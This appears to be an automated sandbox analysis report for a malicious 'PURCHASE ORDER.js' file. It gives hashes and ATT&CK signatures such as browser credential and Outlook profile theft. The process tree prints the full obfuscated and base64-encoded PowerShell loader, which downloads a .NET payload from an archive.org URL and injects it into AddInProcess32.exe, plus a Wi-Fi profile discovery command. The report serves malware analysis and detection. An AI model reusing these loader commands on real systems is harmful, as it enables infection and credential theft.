Analysis
-
max time kernel
92s -
max time network
204s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
20/09/2024, 14:19
General
-
Target
PURCHASE ORDER.js
-
Size
319KB
-
MD5
e8114157714655fdbc7b51cde4f676de
-
SHA1
c23a2b3c76b2b7927f64cf74c3cf75b408a629e4
-
SHA256
d20d1cb56afa7818be3b26074bed7eae73e5480a5a8e0add5384bc9eddbc333d
-
SHA512
9f33a77504f56f4b0bce859d3b61f81cf3496a00d6cfd3aaef708f700149c72f1fb009f15e720a59b013a443c15b3c68a621358c624138b72f3409db53692c8b
-
SSDEEP
6144:1m06WlUzat6poIKNrZUG8IyWwmRn+CvA1HPucBzprZa8qYlVLY8/1PcKpOu4:w06WF6poIKN9UGDykRn+gA1HPu4zpNar
Malware Config
Extracted
https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER.js"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAnAGIATQBCAHUAcgBsACcAKwAnACAAPQAgAE4AVwAnACsAJwBxAGgAdAB0AHAAcwA6ACcAKwAnAC8AJwArACcALwAnACsAJwBpAGEAJwArACcAOQAnACsAJwAwADQAJwArACcANgAwACcAKwAnADEALgB1AHMALgBhAHIAJwArACcAYwBoAGkAdgBlAC4AbwByAGcAJwArACcALwA2AC8AJwArACcAaQB0ACcAKwAnAGUAbQBzAC8AZABlAHQAYQBoACcAKwAnAC0AbgBvAHQAZQAtAGoALwBEAGUAdABhAGgAJwArACcATgBvAHQAZQBKAC4AdAB4AHQATgBXAHEAOwBiAE0AQgBiACcAKwAnAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACAAJwArACcAPQAnACsAJwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AJwArACcATgAnACsAJwBlAHQALgAnACsAJwBXAGUAYgBDAGwAaQBlAG4AdAApAC4AJwArACcARABvAHcAbgAnACsAJwBsAG8AYQBkACcAKwAnAFMAJwArACcAdAByAGkAbgBnACgAYgBNAEIAdQByAGwAJwArACcAKQA7AGIATQAnACsAJwBCAGIAJwArACcAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuAHQAIAA9ACAAJwArACcAWwAnACsAJwBTAHkAcwB0AGUAbQAuACcAKwAnAEMAJwArACcAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwAnACsAJwBlACcAKwAnADYANABTACcAKwAnAHQAcgBpAG4AZwAoAGIATQBCAGIAJwArACcAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwBuAHQAZQBuAHQAKQAnACsAJwA7AGIATQAnACsAJwBCAGEAJwArACcAcwBzAGUAbQBiACcAKwAnAGwAeQAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQAnACsAJwBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAGIATQBCAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuAHQAKQA7AGIATQAnACsAJwBCAHQAeQBwAGUAIAA9ACAAYgBNAEIAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5ACcAKwAnAHAAJwArACcAZQAoAE4AJwArACcAVwBxAFIAdQAnACsAJwBuAFAARQAuAEgAbwAnACsAJwBtAGUATgBXAHEAKQA7AGIATQBCAG0AZQB0AGgAbwBkACAAPQAgAGIATQBCAHQAeQBwAGUALgAnACsAJwBHAGUAdAAnACsAJwBNACcAKwAnAGUAdABoAG8AZAAoAE4AVwBxAFYAQQBJAE4AVwBxACkAOwBiACcAKwAnAE0AQgAnACsAJwBtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAYgBNAEIAbgB1ACcAKwAnAGwAbAAsACAAWwBvAGIAagAnACsAJwBlACcAKwAnAGMAdABbAF0AXQBAACgATgBXAHEAdAB4AHQAJwArACcALgBhAGYAYQAvAHYAZQBkAC4AJwArACcAMgByAC4AMwA5AGIAMwA0ADUAMwAwADIAYQAwADcANQBiADEAYgAnACsAJwBjADAAJwArACcAZAA0ADUAYgA2ADMAMgBlAGIAOQBlAGUANgAnACsAJwAyAC0AYgB1AHAALwAvADoAcwBwACcAKwAnAHQAdABoAE4AVwBxACcAKwAnACAALAAgAE4AVwBxAGQAZQBzAGEAJwArACcAdABpAHYAJwArACcAYQBkAG8ATgBXAHEAIAAnACsAJwAsACAAJwArACcATgAnACsAJwBXAHEAZABlAHMAYQB0AGkAdgBhAGQAbwBOAFcAcQAgACcAKwAnACwAIABOAFcAcQAnACsAJwBkAGUAcwBhAHQAaQB2AGEAJwArACcAZABvAE4AVwBxACwAJwArACcATgBXAHEAQQAnACsAJwBkAGQAJwArACcASQBuACcAKwAnAFAAcgBvAGMAZQAnACsAJwBzAHMAMwAyAE4AVwBxACwATgAnACsAJwBXAHEAZABlACcAKwAnAHMAYQAnACsAJwB0ACcAKwAnAGkAdgBhACcAKwAnAGQAJwArACcAbwBOAFcAJwArACcAcQApACkAJwArACcAOwAnACkALgBSAEUAUABMAGEAQwBFACgAKABbAGMASABhAFIAXQA5ADgAKwBbAGMASABhAFIAXQA3ADcAKwBbAGMASABhAFIAXQA2ADYAKQAsACcAJAAnACkALgBSAEUAUABMAGEAQwBFACgAKABbAGMASABhAFIAXQA3ADgAKwBbAGMASABhAFIAXQA4ADcAKwBbAGMASABhAFIAXQAxADEAMwApACwAWwBzAHQAUgBJAG4ARwBdAFsAYwBIAGEAUgBdADMAOQApAHwAIAAuACgAIAAkAHAAUwBIAG8AbQBlAFsAMgAxAF0AKwAkAHAAcwBoAE8AbQBlAFsAMwA0AF0AKwAnAFgAJwApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('bMBurl'+' = NW'+'qhttps:'+'/'+'/'+'ia'+'9'+'04'+'60'+'1.us.ar'+'chive.org'+'/6/'+'it'+'ems/detah'+'-note-j/Detah'+'NoteJ.txtNWq;bMBb'+'ase64Content '+'='+' (New-Object System.'+'N'+'et.'+'WebClient).'+'Down'+'load'+'S'+'tring(bMBurl'+');bM'+'Bb'+'in'+'aryContent = '+'['+'System.'+'C'+'onvert]::FromBas'+'e'+'64S'+'tring(bMBb'+'as'+'e64C'+'ontent)'+';bM'+'Ba'+'ssemb'+'ly = [Reflecti'+'on.Assembly]::Load(bMBbin'+'aryContent);bM'+'Btype = bMBassembly.GetTy'+'p'+'e(N'+'WqRu'+'nPE.Ho'+'meNWq);bMBmethod = bMBtype.'+'Get'+'M'+'ethod(NWqVAINWq);b'+'MB'+'method.Invoke(bMBnu'+'ll, [obj'+'e'+'ct[]]@(NWqtxt'+'.afa/ved.'+'2r.39b345302a075b1b'+'c0'+'d45b632eb9ee6'+'2-bup//:sp'+'tthNWq'+' , NWqdesa'+'tiv'+'adoNWq '+', '+'N'+'WqdesativadoNWq '+', NWq'+'desativa'+'doNWq,'+'NWqA'+'dd'+'In'+'Proce'+'ss32NWq,N'+'Wqde'+'sa'+'t'+'iva'+'d'+'oNW'+'q))'+';').REPLaCE(([cHaR]98+[cHaR]77+[cHaR]66),'$').REPLaCE(([cHaR]78+[cHaR]87+[cHaR]113),[stRInG][cHaR]39)| .( $pSHome[21]+$pshOme[34]+'X')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All5⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650016⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr All6⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
408KB
-
Filesize
1.8MB
-
Filesize
88KB
-
Filesize
5.2MB
-
Filesize
5.6MB
-
Filesize
88KB
-
Filesize
584KB
-
Filesize
920KB
-
Filesize
472KB
-
Filesize
72KB
-
Filesize
2.0MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB